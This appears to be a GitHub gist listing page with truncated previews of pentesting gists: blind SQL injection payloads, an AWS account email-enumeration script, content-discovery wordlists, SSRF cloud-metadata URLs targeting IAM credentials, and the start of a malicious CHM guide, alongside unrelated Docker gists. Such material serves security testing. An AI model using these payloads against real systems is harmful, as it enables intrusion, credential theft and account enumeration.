Shrumplestiltskin

😂
<script>alert(1)</script>
@righettod
righettod / payloads.txt
Last active February 10, 2024 12:22
Payloads to try to discover blind SQLi when no error is returned.
# The situation is the following:
# You enter ab in a feature and it returns data to you, but when you enter ab' it indicates that there is no data found.
#
# So, does it mean that there is no SQLi because ab' is well handled, OR that the error is caught
# and a "no data found" message is returned?
#
# The goal here is to submit a payload that, if interpreted by the SQL DB, will give ab and then data will be returned,
# thus indicating that there is a SQLi because the payload is interpreted.
ab';#
ab';--
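#!/bin/bash
# Build an HTML page of clickable links from a file of URLs (one per line).
echo "<title>Generated hyper Link URLS</title>" >> "$1-urls.html"
# read -r keeps backslashes in URLs intact; quoting "$1" handles paths with spaces
while read -r urls; do
    echo "<a href=\"${urls}\">${urls}</a></br></br>" >> "$1-urls.html"
done < "$1"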
{
"mode": "patterns",
"proxySettings": [
{
"address": "127.0.0.1",
"port": 8080,
"username": "",
"password": "",
"type": 1,
"title": "127.0.0.1:8080",
@flerpadoo
flerpadoo / awsEmailCheck.py
Last active July 23, 2020 22:36
Determines if there is an AWS account associated with a given email address
import re
import sys
import subprocess
from time import sleep # Can be optimized / replaced
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
def bruteAmazonEmailLogin(userEmail):
    options = Options()
    options.add_argument("--headless")
@nullenc0de
nullenc0de / content_discovery_nullenc0de.txt
Last active May 8, 2024 18:22
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
@jhaddix
jhaddix / cloud_metadata.txt
Last active June 10, 2024 09:08 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@dkurzaj
dkurzaj / README.md
Last active April 3, 2023 06:54
Docker compose Kafka, Zookeeper and Kafka manager

Gist inspired by this one, intended to be an updated version of it: https://gist.github.com/17twenty/d619f922ab209f750630824f7c6836e3

Install

  • Create the environment variable that contains our host name (IP address):
$ export EXPOSED_HOSTNAME=$(ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1  -d'/')
  • Create the folders:
@mgeeky
mgeeky / Malicious-CHM-Guide.md
Created February 6, 2018 13:52
Cheat sheet describing how to create a malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within the "docs" directory and insert the following code into its <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
@PurpleBooth
PurpleBooth / Dockerfile
Last active March 21, 2024 09:33
Create a static binary in go and put it in a from scratch docker container
FROM golang:1.9
WORKDIR /go/src/github.com/purplebooth/example
COPY . .
RUN go build -ldflags "-linkmode external -extldflags -static" -a main.go
FROM scratch
COPY --from=0 /go/src/github.com/purplebooth/example/main /main
CMD ["/main"]